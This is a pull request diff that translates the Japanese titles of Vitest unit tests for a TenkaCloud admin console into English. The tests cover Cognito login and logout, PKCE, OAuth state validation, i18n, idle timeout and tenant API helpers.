### PR TITLE
chore(tests): translate test titles from 〜すべき to should ...

### DIFF
--- a/apps/admin-console/src/auth/cognito.test.ts
+++ b/apps/admin-console/src/auth/cognito.test.ts
@@ -55,7 +55,7 @@ describe("beginLogout (Issue #833)", () => {
     vi.unstubAllGlobals();
   });
 
-  it("refresh token を /oauth2/revoke に POST してから sessionStorage を clear すべき", async () => {
+  it("should POST the refresh token to /oauth2/revoke and then clear sessionStorage", async () => {
     storeTokens("refresh.jwt");
 
     await beginLogout(CONFIG);
@@ -70,7 +70,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(sessionStorage.getItem(TOKENS_KEY)).toBeNull();
   });
 
-  it("refresh token が無いときは /oauth2/revoke を呼ばずに redirect すべき", async () => {
+  it("should redirect without calling /oauth2/revoke when there is no refresh token", async () => {
     storeTokens(undefined);
 
     await beginLogout(CONFIG);
@@ -79,7 +79,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(assignSpy).toHaveBeenCalledTimes(1);
   });
 
-  it("/logout に client_id + logout_uri + redirect_uri を付けて redirect すべき (OIDC-conformant 互換)", async () => {
+  it("should redirect to /logout with client_id + logout_uri + redirect_uri (OIDC-conformant compatible)", async () => {
     storeTokens("refresh.jwt");
 
     await beginLogout(CONFIG);
@@ -97,7 +97,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(redirectedTo.searchParams.get("response_type")).toBe("code");
   });
 
-  it("/oauth2/revoke が失敗しても redirect は実行されるべき (= revoke failure で sign-out が止まらない)", async () => {
+  it("should still perform the redirect when /oauth2/revoke fails (= revoke failure does not stop sign-out)", async () => {
     storeTokens("refresh.jwt");
     fetchSpy.mockRejectedValueOnce(new Error("network down"));
 

--- a/apps/admin-console/src/i18n/i18n.test.tsx
+++ b/apps/admin-console/src/i18n/i18n.test.tsx
@@ -20,12 +20,12 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     return <I18nProvider>{children}</I18nProvider>;
   }
 
-  it("default locale は ja (navigator.language 未対応の test 環境 default)", () => {
+  it("should use ja as the default locale (test-env default when navigator.language is not supported)", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     expect(result.current.locale).toMatch(/^(ja|en)$/);
   });
 
-  it("setLocale が localStorage に永続化し次回起動で復元すべき", () => {
+  it("should persist setLocale to localStorage and restore it on next startup", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(result.current.locale).toBe("en");
@@ -33,7 +33,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(window.localStorage.getItem("tenkacloud.admin.locale")).toBe("en");
   });
 
-  it("t() は dot-separated key で nested dictionary を引くべき", () => {
+  it("should look up the nested dictionary via dot-separated keys in t()", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("ja"));
     expect(result.current.t("app.title")).toBe("TenkaCloud 管理コンソール");
@@ -41,7 +41,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current.t("app.title")).toBe("TenkaCloud Admin Console");
   });
 
-  it("locale で key 未定義なら en で fallback、 en にも無ければ raw key", () => {
+  it("should fall back to en when a key is undefined for the locale, and to the raw key when also missing in en", () => {
     const { result } = renderHook(() => useT(), { wrapper });
     // 全 locale にあるキー → 翻訳成功
     expect(result.current("nav.tenants")).toBeTruthy();
@@ -50,7 +50,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current("nonexistent.key")).toBe("nonexistent.key");
   });
 
-  it("SUPPORTED_LOCALES = 2 言語 [ja, en] (#1078 で zh/es 廃止)", () => {
+  it("should expose SUPPORTED_LOCALES as 2 languages [ja, en] (zh/es removed in #1078)", () => {
     const supported: readonly LocaleCode[] = ["ja", "en"];
     for (const code of supported) {
       const dict = _testInternals.LOCALE_DICTIONARIES[code];
@@ -60,7 +60,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     }
   });
 
-  it("admin drill-down namespace の key set が ja/en で一致すべき", () => {
+  it("should keep the admin drill-down namespace key set identical between ja/en", () => {
     const namespaces = ["admin_event_detail", "admin_deployment_detail"];
     const collectLeafKeys = (node: unknown, prefix = ""): string[] => {
       if (typeof node !== "object" || node === null) return [prefix];
@@ -76,7 +76,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     }
   });
 
-  it("locale 変更時に <html lang> が追従すべき", () => {
+  it("should make <html lang> follow the locale on change", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(document.documentElement.lang).toBe("en");
@@ -84,13 +84,13 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(document.documentElement.lang).toBe("ja");
   });
 
-  it("useI18n を Provider 外で呼ぶと throw すべき (= configuration error の早期発見)", () => {
+  it("should throw when useI18n is called outside the Provider (= early detection of configuration error)", () => {
     // renderHook で wrapper を渡さないと throws する
     expect(() => renderHook(() => useI18n())).toThrow(/I18nProvider/);
   });
 
   // 翻訳結果が UI に出ることを実 render で確認
-  it("Provider 配下で翻訳結果が UI に反映されるべき", () => {
+  it("should reflect translation results in the UI under the Provider", () => {
     function Probe() {
       const t = useT();
       return <div>{t("app.loading")}</div>;
@@ -107,15 +107,15 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
 });
 
 describe("interpolate (#655)", () => {
-  it("単一 placeholder を埋め込むべき", () => {
+  it("should embed a single placeholder", () => {
     expect(interpolate("Hello {name}!", { name: "World" })).toBe("Hello World!");
   });
 
-  it("複数 placeholder を 1 pass で埋め込むべき", () => {
+  it("should embed multiple placeholders in a single pass", () => {
     expect(interpolate("{a} - {b} - {a}", { a: "X", b: "Y" })).toBe("X - Y - X");
   });
 
-  it("値に placeholder と同形 string が含まれても 2 重置換しないべき (= 病的 input 防御)", () => {
+  it("should not double-substitute when a value contains a string identical to a placeholder (= pathological input defense)", () => {
     // 旧来の .replace().replace() chain だと {tenantName} = "{tenantId}" のとき
     // 続く tenantId 置換で意図せず展開された。 1 pass regex なら問題なし。
     expect(
@@ -126,11 +126,11 @@ describe("interpolate (#655)", () => {
     ).toBe("name={tenantId} id=abc-123");
   });
 
-  it("未定義 key は空文字列に置換し raw {name} を UI に漏らさないべき", () => {
+  it("should substitute undefined keys with an empty string and not leak raw {name} to the UI", () => {
     expect(interpolate("Hello {missing}!", {})).toBe("Hello !");
   });
 
-  it("placeholder が無い template はそのまま返すべき", () => {
+  it("should return a template without placeholders unchanged", () => {
     expect(interpolate("no placeholder", { a: "X" })).toBe("no placeholder");
   });
 });

--- a/apps/admin-console/test/AuthProvider.test.tsx
+++ b/apps/admin-console/test/AuthProvider.test.tsx
@@ -56,7 +56,7 @@ describe("AuthProvider idle timeout (#859)", () => {
     vi.useRealTimers();
   });
 
-  it("tokens が無いときは idle timer を起動しないべき", async () => {
+  it("should not start the idle timer when there are no tokens", async () => {
     render(
       <AuthProvider config={config}>
         <TokensDisplay />
@@ -73,7 +73,7 @@ describe("AuthProvider idle timeout (#859)", () => {
     expect(beginLogoutMock).not.toHaveBeenCalled();
   });
 
-  it("tokens 有りで 15 min 無操作なら beginLogout を呼ぶべき", async () => {
+  it("should call beginLogout when tokens are present and 15 min pass without activity", async () => {
     const valid = {
       idToken: "id",
       accessToken: "ac",
@@ -106,7 +106,7 @@ describe("AuthProvider idle timeout (#859)", () => {
     expect(beginLogoutMock).toHaveBeenCalledTimes(1);
   });
 
-  it("user 操作 (keydown) で idle timer は reset されるべき", async () => {
+  it("should reset the idle timer on user activity (keydown)", async () => {
     const valid = {
       idToken: "id",
       accessToken: "ac",

--- a/apps/admin-console/test/api-client.test.ts
+++ b/apps/admin-console/test/api-client.test.ts
@@ -19,8 +19,8 @@ const config: AppConfig = {
 describe("createApiClient", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  describe("GET 呼び出し時", () => {
-    it("apiBaseUrl にパスを連結し Authorization ヘッダを付与すべき", async () => {
+  describe("when calling GET", () => {
+    it("should append the path to apiBaseUrl and attach an Authorization header", async () => {
       const fetchMock = vi
         .fn()
         .mockResolvedValue(new Response(JSON.stringify({ data: [] }), { status: 200 }));
@@ -35,8 +35,8 @@ describe("createApiClient", () => {
     });
   });
 
-  describe("POST 呼び出し時", () => {
-    it("body を JSON 文字列にして送るべき", async () => {
+  describe("when calling POST", () => {
+    it("should send the body as a JSON string", async () => {
       const fetchMock = vi.fn().mockResolvedValue(new Response("{}", { status: 200 }));
       vi.stubGlobal("fetch", fetchMock);
 
@@ -49,8 +49,8 @@ describe("createApiClient", () => {
     });
   });
 
-  describe("サーバが 4xx を返したとき", () => {
-    it("ApiError を投げるべき", async () => {
+  describe("when the server returns 4xx", () => {
+    it("should throw an ApiError", async () => {
       vi.stubGlobal(
         "fetch",
         vi.fn().mockResolvedValue(new Response("bad", { status: 400, statusText: "Bad" })),

--- a/apps/admin-console/test/audit-log.test.ts
+++ b/apps/admin-console/test/audit-log.test.ts
@@ -29,12 +29,12 @@ const secondItem = {
 };
 
 describe("AuditLog helpers", () => {
-  it("tenant scope で tenantId が空なら validation error を返すべき", () => {
+  it("should return a validation error when tenantId is empty under tenant scope", () => {
     expect(validateAuditLoadInput("tenant", "  ", t)).toBe("t:audit_log.tenant_id_required");
     expect(validateAuditLoadInput("system", "  ", t)).toBeNull();
   });
 
-  it("Audit API list input は tenantId を trim し cursor を必要時だけ含めるべき", () => {
+  it("should trim tenantId in the Audit API list input and only include cursor when needed", () => {
     expect(buildAuditListInput("tenant", " tenant-a ", "next")).toEqual({
       scope: "tenant",
       tenantId: "tenant-a",
@@ -47,12 +47,12 @@ describe("AuditLog helpers", () => {
     });
   });
 
-  it("cursor ありなら audit items を append し cursor 無しなら差し替えるべき", () => {
+  it("should append audit items when a cursor is present and replace them when no cursor", () => {
     expect(mergeAuditItems([firstItem], [secondItem], "next")).toEqual([firstItem, secondItem]);
     expect(mergeAuditItems([firstItem], [secondItem], undefined)).toEqual([secondItem]);
   });
 
-  it("Audit API error と unknown error を表示文言に変換すべき", () => {
+  it("should convert Audit API errors and unknown errors to display text", () => {
     expect(describeAuditLoadError(new AuditApiError(StatusCodes.FORBIDDEN, undefined), t)).toBe(
       "SystemAdmin role が必要です",
     );

--- a/apps/admin-console/test/cognito.test.ts
+++ b/apps/admin-console/test/cognito.test.ts
@@ -19,14 +19,14 @@ const config: AppConfig = {
 describe("loadStoredTokens", () => {
   beforeEach(() => sessionStorage.clear());
 
-  describe("sessionStorage にトークンが無いとき", () => {
-    it("null を返すべき", () => {
+  describe("when there is no token in sessionStorage", () => {
+    it("should return null", () => {
       expect(loadStoredTokens()).toBeNull();
     });
   });
 
-  describe("保存されたトークンが既に expire しているとき", () => {
-    it("null を返すべき", () => {
+  describe("when the stored token has already expired", () => {
+    it("should return null", () => {
       const expired: TokenSet = {
         idToken: "id",
         accessToken: "ac",
@@ -37,8 +37,8 @@ describe("loadStoredTokens", () => {
     });
   });
 
-  describe("有効なトークンが保存されているとき", () => {
-    it("その TokenSet を返すべき", () => {
+  describe("when a valid token is stored", () => {
+    it("should return that TokenSet", () => {
       const valid: TokenSet = {
         idToken: "id",
         accessToken: "ac",
@@ -56,8 +56,8 @@ describe("completeLogin", () => {
     sessionStorage.clear();
   });
 
-  describe("PKCE verifier が session に無いとき", () => {
-    it("エラーを投げるべき", async () => {
+  describe("when the PKCE verifier is missing from the session", () => {
+    it("should throw an error", async () => {
       // Issue #873: vitest 4.x で `.rejects.toThrow(/regex/)` の message 照合 regression あり。
       await expect(completeLogin(config, "code")).rejects.toMatchObject({
         message: expect.stringContaining("PKCE verifier missing"),
@@ -65,7 +65,7 @@ describe("completeLogin", () => {
     });
   });
 
-  describe("Cognito が 200 とトークンを返したとき", () => {
+  describe("when Cognito returns 200 with tokens", () => {
     let tokens: TokenSet;
     beforeEach(async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
@@ -88,29 +88,29 @@ describe("completeLogin", () => {
       tokens = await completeLogin(config, "code", "STATE-OK");
     });
 
-    it("id_token を TokenSet.idToken に入れるべき", () => {
+    it("should put id_token into TokenSet.idToken", () => {
       expect(tokens.idToken).toBe("ID");
     });
 
-    it("access_token を TokenSet.accessToken に入れるべき", () => {
+    it("should put access_token into TokenSet.accessToken", () => {
       expect(tokens.accessToken).toBe("AC");
     });
 
-    it("refresh_token を TokenSet.refreshToken に入れるべき", () => {
+    it("should put refresh_token into TokenSet.refreshToken", () => {
       expect(tokens.refreshToken).toBe("RF");
     });
 
-    it("expires_in を未来時刻 (expiresAt) に換算するべき", () => {
+    it("should convert expires_in into a future timestamp (expiresAt)", () => {
       expect(tokens.expiresAt).toBeGreaterThan(Date.now());
     });
 
-    it("トークンを sessionStorage に永続化するべき", () => {
+    it("should persist tokens to sessionStorage", () => {
       expect(loadStoredTokens()?.idToken).toBe("ID");
     });
   });
 
-  describe("Cognito が 4xx を返したとき", () => {
-    it("ステータスと detail を含むエラーを投げるべき", async () => {
+  describe("when Cognito returns 4xx", () => {
+    it("should throw an error including the status and detail", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       // Issue #861: state validation 経由で state を渡す。
       sessionStorage.setItem("TenkaCloud.oauth_state", "STATE-OK");
@@ -130,7 +130,7 @@ describe("completeLogin", () => {
   });
 
   describe("Issue #861: state validation fail-closed", () => {
-    it("returnedState 不一致は throw", async () => {
+    it("should throw when returnedState does not match", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       sessionStorage.setItem("TenkaCloud.oauth_state", "EXPECTED");
       await expect(completeLogin(config, "code", "ATTACKER-STATE")).rejects.toMatchObject({
@@ -138,7 +138,7 @@ describe("completeLogin", () => {
       });
     });
 
-    it("sessionStorage に state が無いとき (= session clear / CSRF 経路) も throw", async () => {
+    it("should throw when state is missing from sessionStorage (= session clear / CSRF path)", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       // STATE_KEY を入れない
       await expect(completeLogin(config, "code", "ATTACKER-STATE")).rejects.toMatchObject({
@@ -146,7 +146,7 @@ describe("completeLogin", () => {
       });
     });
 
-    it("returnedState 未指定でも throw (= 旧 silent skip の bypass を塞ぐ)", async () => {
+    it("should throw even when returnedState is not specified (= closes the old silent-skip bypass)", async () => {
       sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
       sessionStorage.setItem("TenkaCloud.oauth_state", "EXPECTED");
       await expect(completeLogin(config, "code")).rejects.toMatchObject({
@@ -157,7 +157,7 @@ describe("completeLogin", () => {
 });
 
 describe("clearTokens", () => {
-  it("保存された verifier とトークンを両方削除すべき", () => {
+  it("should delete both the stored verifier and the tokens", () => {
     sessionStorage.setItem("TenkaCloud.pkce_verifier", "v");
     sessionStorage.setItem("TenkaCloud.tokens", "{}");
     clearTokens();

--- a/apps/admin-console/test/insight.test.ts
+++ b/apps/admin-console/test/insight.test.ts
@@ -28,7 +28,7 @@ describe("fetchTenantsInsightSummary", () => {
     vi.unstubAllGlobals();
   });
 
-  it("AdminInsight URL が空文字 (= 未配線) のとき null を返すべき", async () => {
+  it("should return null when the AdminInsight URL is empty (= not wired)", async () => {
     const res = await fetchTenantsInsightSummary(
       { ...baseConfig, adminInsightApiUrl: "" },
       "id-token",
@@ -38,13 +38,13 @@ describe("fetchTenantsInsightSummary", () => {
     expect(globalThis.fetch).not.toHaveBeenCalled();
   });
 
-  it("tenantIds が空配列なら fetch せず { items: [] } を返すべき", async () => {
+  it("should return { items: [] } without fetching when tenantIds is an empty array", async () => {
     const res = await fetchTenantsInsightSummary(baseConfig, "id-token", []);
     expect(res).toEqual({ items: [] });
     expect(globalThis.fetch).not.toHaveBeenCalled();
   });
 
-  it("正常系: AdminInsight API を bearer 認証付きで叩くべき", async () => {
+  it("should call the AdminInsight API with bearer authentication on the happy path", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValueOnce(
       new Response(
         JSON.stringify({
@@ -63,7 +63,7 @@ describe("fetchTenantsInsightSummary", () => {
     });
   });
 
-  it("403 (SystemAdmin claim 無し) のときは null を返すべき (= column hide)", async () => {
+  it("should return null on 403 (no SystemAdmin claim) (= column hide)", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValueOnce(
       new Response(JSON.stringify({ error: "forbidden" }), { status: 403 }),
     );
@@ -71,7 +71,7 @@ describe("fetchTenantsInsightSummary", () => {
     expect(res).toBeNull();
   });
 
-  it("500 など 403 以外の error は throw すべき", async () => {
+  it("should throw on non-403 errors such as 500", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValueOnce(
       new Response(JSON.stringify({ error: "internal" }), { status: 500 }),
     );
@@ -83,7 +83,7 @@ describe("fetchTenantsInsightSummary", () => {
 });
 
 describe("indexSummaryByTenantId", () => {
-  it("tenantId をキーにした Record を返すべき", () => {
+  it("should return a Record keyed by tenantId", () => {
     const items: TenantInsightSummary[] = [
       { tenantId: "t-1", activeDeploys: 1, failedDeploys: 0, totalEvents: 2 },
       { tenantId: "t-2", activeDeploys: 0, failedDeploys: 3, totalEvents: 1 },
@@ -93,7 +93,7 @@ describe("indexSummaryByTenantId", () => {
     expect(index["t-2"]?.failedDeploys).toBe(3);
   });
 
-  it("空 items で空 Record を返すべき", () => {
+  it("should return an empty Record for empty items", () => {
     expect(indexSummaryByTenantId({ items: [] })).toEqual({});
   });
 });

--- a/apps/admin-console/test/lib/tenant-progress.test.ts
+++ b/apps/admin-console/test/lib/tenant-progress.test.ts
@@ -4,7 +4,7 @@ import { computeTenantProgress, isInProgress } from "../../src/lib/tenant-progre
 const BASE = Date.parse("2026-05-13T20:00:00.000Z");
 
 describe("computeTenantProgress", () => {
-  it('createdAt の 3 分後は "3 分経過" + severity=ok を返すべき', () => {
+  it('should return "3 分経過" + severity=ok 3 minutes after createdAt', () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:57:00.000Z",
       nowMs: BASE,
@@ -13,7 +13,7 @@ describe("computeTenantProgress", () => {
     expect(out.label).toBe("3 分経過");
   });
 
-  it("createdAt の 32 分後は severity=warning に切り替わるべき", () => {
+  it("should switch to severity=warning 32 minutes after createdAt", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:28:00.000Z",
       nowMs: BASE,
@@ -22,7 +22,7 @@ describe("computeTenantProgress", () => {
     expect(out.label).toBe("32 分経過");
   });
 
-  it("createdAt の 75 分後は severity=danger に切り替わるべき (= 失敗ハング示唆)", () => {
+  it("should switch to severity=danger 75 minutes after createdAt (= suggests failure hang)", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T18:45:00.000Z",
       nowMs: BASE,
@@ -31,18 +31,18 @@ describe("computeTenantProgress", () => {
     expect(out.label).toBe("1 時間 15 分経過");
   });
 
-  it('createdAt 不在の場合は label="—" + severity=ok を返すべき', () => {
+  it('should return label="—" + severity=ok when createdAt is absent', () => {
     const out = computeTenantProgress({ createdAt: undefined, nowMs: BASE });
     expect(out.severity).toBe("ok");
     expect(out.label).toBe("—");
   });
 
-  it('createdAt が parse 不能な string の場合も label="—" を返すべき (defensive)', () => {
+  it('should return label="—" when createdAt is an unparsable string as well (defensive)', () => {
     const out = computeTenantProgress({ createdAt: "not-an-iso-date", nowMs: BASE });
     expect(out.label).toBe("—");
   });
 
-  it("createdAt が未来 (= clock skew) でも負数経過ではなく 0 秒経過扱い", () => {
+  it("should treat a future createdAt (= clock skew) as 0 seconds elapsed rather than negative", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T20:01:00.000Z",
       nowMs: BASE,
@@ -51,7 +51,7 @@ describe("computeTenantProgress", () => {
     expect(out.label).toBe("0 秒経過");
   });
 
-  it("経過時間が正確に 30 分 (= 境界値) の場合は severity=warning に切り替わるべき", () => {
+  it("should switch to severity=warning when elapsed time is exactly 30 minutes (= boundary value)", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:30:00.000Z",
       nowMs: BASE,
@@ -59,7 +59,7 @@ describe("computeTenantProgress", () => {
     expect(out.severity).toBe("warning");
   });
 
-  it("経過時間が 30 分 - 1 ms (= 境界値直前) は severity=ok を維持するべき", () => {
+  it("should keep severity=ok at 30 minutes - 1 ms (= just before the boundary)", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:30:00.001Z",
       nowMs: BASE,
@@ -67,7 +67,7 @@ describe("computeTenantProgress", () => {
     expect(out.severity).toBe("ok");
   });
 
-  it("経過時間が正確に 60 分 (= 境界値) の場合は severity=danger に切り替わるべき", () => {
+  it("should switch to severity=danger when elapsed time is exactly 60 minutes (= boundary value)", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:00:00.000Z",
       nowMs: BASE,
@@ -75,7 +75,7 @@ describe("computeTenantProgress", () => {
     expect(out.severity).toBe("danger");
   });
 
-  it("経過時間が 60 分 - 1 ms (= 境界値直前) は severity=warning を維持するべき", () => {
+  it("should keep severity=warning at 60 minutes - 1 ms (= just before the boundary)", () => {
     const out = computeTenantProgress({
       createdAt: "2026-05-13T19:00:00.001Z",
       nowMs: BASE,
@@ -85,19 +85,19 @@ describe("computeTenantProgress", () => {
 });
 
 describe("isInProgress", () => {
-  it('SBT が返す "In progress" を真と判定するべき', () => {
+  it('should treat the "In progress" value returned by SBT as true', () => {
     expect(isInProgress("In progress")).toBe(true);
   });
 
-  it('ULID backend が返す "IN_PROGRESS" を真と判定するべき (defensive)', () => {
+  it('should treat the "IN_PROGRESS" value returned by the ULID backend as true (defensive)', () => {
     expect(isInProgress("IN_PROGRESS")).toBe(true);
   });
 
-  it('"Provisioning" も真と判定するべき (= SBT v0.3.10 系)', () => {
+  it('should also treat "Provisioning" as true (= SBT v0.3.10 line)', () => {
     expect(isInProgress("Provisioning")).toBe(true);
   });
 
-  it("Complete / Failed / Deleted / undefined は偽を返すべき", () => {
+  it("should return false for Complete / Failed / Deleted / undefined", () => {
     expect(isInProgress("Complete")).toBe(false);
     expect(isInProgress("Failed")).toBe(false);
     expect(isInProgress("Deleted")).toBe(false);

--- a/apps/admin-console/test/pkce.test.ts
+++ b/apps/admin-console/test/pkce.test.ts
@@ -2,20 +2,20 @@ import { describe, expect, it } from "vitest";
 import { deriveChallenge, generateVerifier } from "../src/auth/pkce";
 
 describe("generateVerifier", () => {
-  describe("指定された長さで呼び出したとき", () => {
-    it("その長さ（43〜128 の範囲）の文字列を返すべき", () => {
+  describe("when called with a specified length", () => {
+    it("should return a string of that length (within the 43-128 range)", () => {
       const verifier = generateVerifier(64);
       expect(verifier.length).toBe(64);
     });
 
-    it("RFC 7636 の文字集合（[A-Za-z0-9\\-._~]）のみを含むべき", () => {
+    it("should only contain characters from the RFC 7636 character set ([A-Za-z0-9\\-._~])", () => {
       const verifier = generateVerifier(64);
       expect(verifier).toMatch(/^[A-Za-z0-9\-._~]+$/);
     });
   });
 
-  describe("複数回呼び出したとき", () => {
-    it("それぞれ異なる値を返すべき", () => {
+  describe("when called multiple times", () => {
+    it("should return a different value each time", () => {
       const a = generateVerifier();
       const b = generateVerifier();
       expect(a).not.toBe(b);
@@ -24,8 +24,8 @@ describe("generateVerifier", () => {
 });
 
 describe("deriveChallenge", () => {
-  describe("既知の verifier を渡したとき", () => {
-    it("RFC 7636 Appendix B の base64url(SHA-256) を返すべき", async () => {
+  describe("when passed a known verifier", () => {
+    it("should return the base64url(SHA-256) value from RFC 7636 Appendix B", async () => {
       const verifier = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk";
       const expected = "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM";
       expect(await deriveChallenge(verifier)).toBe(expected);

--- a/apps/admin-console/test/tenants.test.ts
+++ b/apps/admin-console/test/tenants.test.ts
@@ -24,8 +24,8 @@ function buildApiMock(overrides: Partial<ApiClient> = {}): {
 }
 
 describe("createTenant", () => {
-  describe("SBT v0.3.9 の POST /tenants で onboarding を起動させるとき", () => {
-    it("POST /tenants に飛ばすべき", async () => {
+  describe("when starting onboarding via SBT v0.3.9 POST /tenants", () => {
+    it("should send a POST to /tenants", async () => {
       const { api, post } = buildApiMock();
       post.mockResolvedValueOnce({
         data: {
@@ -44,7 +44,7 @@ describe("createTenant", () => {
       expect(path).toBe("tenants");
     });
 
-    it("body は flat shape で送るべき (tenantName / email / tier / tenantStatus)", async () => {
+    it("should send the body as a flat shape (tenantName / email / tier / tenantStatus)", async () => {
       const { api, post } = buildApiMock();
       post.mockResolvedValueOnce({
         data: {
@@ -67,7 +67,7 @@ describe("createTenant", () => {
       });
     });
 
-    it("tenantStatus の初期値は 'In progress' 固定であるべき", async () => {
+    it("should fix the initial tenantStatus value as 'In progress'", async () => {
       const { api, post } = buildApiMock();
       post.mockResolvedValueOnce({
         data: {
@@ -86,8 +86,8 @@ describe("createTenant", () => {
     });
   });
 
-  describe("サーバが data を返すとき", () => {
-    it("data 中の tenant を返すべき", async () => {
+  describe("when the server returns data", () => {
+    it("should return the tenant inside data", async () => {
       const { api, post } = buildApiMock();
       post.mockResolvedValueOnce({
         data: {
@@ -106,8 +106,8 @@ describe("createTenant", () => {
     });
   });
 
-  describe("サーバがエラーを投げたとき", () => {
-    it("そのまま伝搬すべき", async () => {
+  describe("when the server throws an error", () => {
+    it("should propagate it as-is", async () => {
       const { api, post } = buildApiMock();
       post.mockRejectedValueOnce(new Error("API 500"));
 
@@ -120,8 +120,8 @@ describe("createTenant", () => {
 });
 
 describe("listTenants", () => {
-  describe("サーバが `{data: [...]}` を返すとき", () => {
-    it("data 配列を返すべき", async () => {
+  describe("when the server returns `{data: [...]}`", () => {
+    it("should return the data array", async () => {
       const { api, get } = buildApiMock();
       get.mockResolvedValueOnce({
         data: [
@@ -142,8 +142,8 @@ describe("listTenants", () => {
     });
   });
 
-  describe("サーバが配列を直接返すとき", () => {
-    it("その配列を返すべき", async () => {
+  describe("when the server returns an array directly", () => {
+    it("should return that array", async () => {
       const { api, get } = buildApiMock();
       get.mockResolvedValueOnce([
         {
@@ -161,8 +161,8 @@ describe("listTenants", () => {
     });
   });
 
-  describe("サーバが data 無しで返すとき", () => {
-    it("空配列を返すべき", async () => {
+  describe("when the server returns without data", () => {
+    it("should return an empty array", async () => {
       const { api, get } = buildApiMock();
       get.mockResolvedValueOnce({});
 
@@ -174,8 +174,8 @@ describe("listTenants", () => {
 });
 
 describe("deleteTenant", () => {
-  describe("SBT の /tenants DELETE を叩くとき", () => {
-    it("`tenants/<id>` パスを URL エンコードして呼ぶべき", async () => {
+  describe("when calling SBT's /tenants DELETE", () => {
+    it("should URL-encode the `tenants/<id>` path", async () => {
       const { api, del } = buildApiMock();
       del.mockResolvedValueOnce(undefined);
 
@@ -187,8 +187,8 @@ describe("deleteTenant", () => {
 });
 
 describe("parseTenantConfig", () => {
-  describe("provision-tenant.sh が出力する完全な JSON を渡したとき", () => {
-    it("4 フィールド全部 (userPoolId / appClientId / apiGatewayUrl / applicationAdminConsoleUrl) を返すべき", () => {
+  describe("when passed the full JSON that provision-tenant.sh emits", () => {
+    it("should return all 4 fields (userPoolId / appClientId / apiGatewayUrl / applicationAdminConsoleUrl)", () => {
       const raw = JSON.stringify({
         userPoolId: "ap-northeast-1_xxx",
         appClientId: "abc",
@@ -203,20 +203,20 @@ describe("parseTenantConfig", () => {
     });
   });
 
-  describe("undefined を渡したとき", () => {
-    it("空オブジェクトを返すべき", () => {
+  describe("when passed undefined", () => {
+    it("should return an empty object", () => {
       expect(parseTenantConfig(undefined)).toEqual({});
     });
   });
 
-  describe("不正な JSON 文字列を渡したとき", () => {
-    it("空オブジェクトにフォールバックすべき (例外を投げない)", () => {
+  describe("when passed an invalid JSON string", () => {
+    it("should fall back to an empty object (without throwing)", () => {
       expect(parseTenantConfig("not json")).toEqual({});
     });
   });
 
-  describe("一部フィールドだけの JSON を渡したとき", () => {
-    it("欠落フィールドは undefined のまま、存在するフィールドは取れるべき", () => {
+  describe("when passed JSON with only some fields", () => {
+    it("should leave missing fields undefined and return the present ones", () => {
       const raw = JSON.stringify({ userPoolId: "p" });
       const parsed = parseTenantConfig(raw);
       expect(parsed.userPoolId).toBe("p");
@@ -224,8 +224,8 @@ describe("parseTenantConfig", () => {
     });
   });
 
-  describe("#57 で追加した provisioning 情報", () => {
-    it("provisioningBuildId / projectName / region / accountId を返すべき", () => {
+  describe("provisioning info added in #57", () => {
+    it("should return provisioningBuildId / projectName / region / accountId", () => {
       const raw = JSON.stringify({
         provisioningBuildId: "proj:abcd-1234",
         provisioningProjectName: "proj",
@@ -242,8 +242,8 @@ describe("parseTenantConfig", () => {
 });
 
 describe("buildCodeBuildBuildUrl", () => {
-  describe("必須 4 要素が全部揃っているとき", () => {
-    it("AWS Console CodeBuild build の deep link URL を返すべき", () => {
+  describe("when all 4 required elements are present", () => {
+    it("should return a deep link URL to the AWS Console CodeBuild build", () => {
       const url = buildCodeBuildBuildUrl({
         buildId: "proj:abcd-1234",
         projectName: "proj",
@@ -255,7 +255,7 @@ describe("buildCodeBuildBuildUrl", () => {
       );
     });
 
-    it("buildId 中の `:` を URL エンコード (%3A) すべき", () => {
+    it("should URL-encode `:` (as %3A) inside buildId", () => {
       const url = buildCodeBuildBuildUrl({
         buildId: "proj:uuid",
         projectName: "proj",
@@ -267,8 +267,8 @@ describe("buildCodeBuildBuildUrl", () => {
     });
   });
 
-  describe("buildId が undefined / unknown のとき", () => {
-    it("undefined で null を返すべき", () => {
+  describe("when buildId is undefined / unknown", () => {
+    it("should return null for undefined", () => {
       expect(
         buildCodeBuildBuildUrl({
           buildId: undefined,
@@ -279,7 +279,7 @@ describe("buildCodeBuildBuildUrl", () => {
       ).toBeNull();
     });
 
